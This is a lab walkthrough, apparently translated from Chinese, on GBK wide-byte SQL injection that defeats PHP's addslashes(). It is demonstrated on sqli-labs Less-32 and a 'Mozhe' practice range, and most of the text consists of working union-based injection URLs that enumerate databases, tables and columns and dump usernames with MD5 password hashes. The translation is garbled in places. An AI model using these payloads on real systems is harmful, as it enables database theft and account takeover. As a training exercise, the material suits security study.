1. Function
addslashes() function:
Adds a backslash before the specified predefined character. These predefined characters refer to the
Single quote ('), double quote ("), backslash (/), NUL (Null character)
The function is to castrate the function of these characters, put a \ backslash in front , such as single quotes'
After being filtered by the addslashes() function, it becomes \ '. Characters converted to entities have no function.
When writing or querying the user name ' 1' ', the database will recognize the single quotation mark ' as a closing symbol, and it is required to enter a single quotation mark to close it, which means querying '1' and there is no way to query ' 1' '
If you enter ' 1\' ', \ makes ' lose the closing function, then the data will recognize ' 1' '
2. GBKB encoding
We can bypass by entering a %df in front of the '
Originally you input ?id=1', it will be automatically escaped into ?id=1\', but the encoding in \ is %5c
If you enter a %df in front of it, it will become %df5c, then %df5c will be parsed into a character
So where do %df and %5c come from?
%df is what we entered manually
%5c uses the function addslashes() to automatically add \ before the ' sign, and this \ is %5c
Then put %df and %5c together, they will conform to a GBKB encoding method
The fifth and cth of %df just form a Chinese character.
In this way, he loses the function of this \ that he commented out the ' single quotes
Originally, this \ was to comment out the function of our single quotes.
For example, I originally wanted to find 'to play with, but I lost the function of' single quotes while playing.
But now we manually add a %df in front of his' single quotes. When the addslashes() function adds the \ symbol in front of our' single quotes, the encoding of this symbol is %5c, which is true \ You can't play with the 'single quotes. Instead, %df took %5c to play
Then it becomes %df%5c to play together, 'single quotes to play by yourself. This successfully bypasses the filter
3. Wide byte bypass
Wide byte bypass preconditions:
It is required that the encoding method of the other party is also GBK encoding, and when sending the request, it is stated that the client is also using GBK encoding
4. Case presentation
(1) sqli-labs-master/Less-32
1. Determine the closure mode and determine whether there is an injection point
?id=1%df' and 1=2 --+
?id=1%df') and 1=2 --+
?id=1%df" and 1=2 --+?id=1%df") and 1=2 --+
Tested to ?id=1%df' and 1=2 --+ The page reports an error to confirm that there is an injection point
When we have tested all closed symbols, the page still does not echo
Use %df to test for closure
url: ?id=1%df'
page error
''1�\'' LIMIT 0,1' at line 1
'1�\'' LIMIT 0,1
Determine the closing method as single quotation marks
url: ?id=1%df' --+
Use --+ to comment out the following code
The page echo is normal
url ?id=1%df' and 1=1--+
Use and 1=1 to test the page echo normally
url:?id=1%df' and 1=2 --+
Use and 1=2 to test the page and report an error to confirm that there is an injection point
2. Determine the number of fields
?id=1%df' order by 3--+
url:?id=1%df' order by 4--+
When the fourth field is tested, the page reports an error.
url: ?id=1%df' order by 3 --+
When the third field is tested, the page echo is normal
3. Determine the echo bit
?id=1%df' union select 1,2,3 --+
Make sure the field echoed on the page is
2.3
4. Get the database name
?id=-1%df' union select 1,(database()),3--+
Make sure the database name is Securiry
5. Get the data table name
?id=-1%df' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+
emails,referers,uagents,users
6. Get fields (columns)
?id=-1%df' union select 1,2,(select group_concat(column_name)from information_Schema.columns where table_schema=database() and table_name=0x7573657273)--+
Note: 0x represents hexadecimal, because we usually write table_name='users' in normal tests
But addslashes() here also filters the two single quotes we entered '', so we need to convert our table name into hexadecimal format, and add the fixed writing method of 0x in front.
0x: represents hexadecimal
7573657273: represents users
id
username
password
field
7. Drag library
?id=-1%df' union select 1,2,(select group_concat(username,0x7e,password)from security.users)--+
0x: represents hexadecimal
7e:~ number
The 0x7e here is mainly the symbol we spliced
(2) Mozhe shooting range (wide byte injection)
1. Determine the closing method and judge whether there is an injection point
?id=1%df' and 1=2 --+
url:?id=1%df' and 1=1 --+
The page is echoed normally
?id=1%df' and 1=2--+
page error
Make sure there is an injection
2. Determine the number of fields
?id=1%df' order by 5 --+
url:?id=1%df' order by 5 --+
The page is echoed normally
url:?id=1%df' order by 6 --+
page error
Determine a total of 5 fields
3. Determine the echo bit
?id=-1%df' union select 1,2,3,4,5 --+
Make sure the echo field is 3, 5
4. Get the database name
?id=-1%df' union select 1,2,3,4,(database())--+
url:?id=-1%df' union select 1,2,3,4,(database()) --+
Make sure the current database is
mozhe_discuss_stormgroup
5. Get the data table
?id=-1%df' union select 1,2,3,4,(select group_concat(table_name)from information_schema.tables where table_Schema=database())--+
The current data table is
notice,stormgroup_member
6. Get field (column) information
id=-1%df' union select 1,2,3,4,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7374
6F726D67726F75705F6D656D626572 )--+0x: represents the hexadecimal fixed writing method
73746F726D67726F75705F6D656D626572:stormgroup_member
Note here that whether it is the above sqlibas test or the test here, when you convert the table name to hexadecimal, you can directly convert the table name without double quotes or single quotes.
name,password,status
7. Drag library
?id=-1%df' union select 1,2,3,4,(select group_concat(name,0x7e,password)from mozhe_discuz_stormgroup
.stormgroup_member)--+0x: Hexadecimal fixed writing method
7e:~
mozhe~3114b433dece9180717f2b7de56b28a3,
mozhe~aec5684b03c7c59a55bf958c2f3320e7
There are two accounts here, using the md5 encryption method. Take it to decrypt and log in.
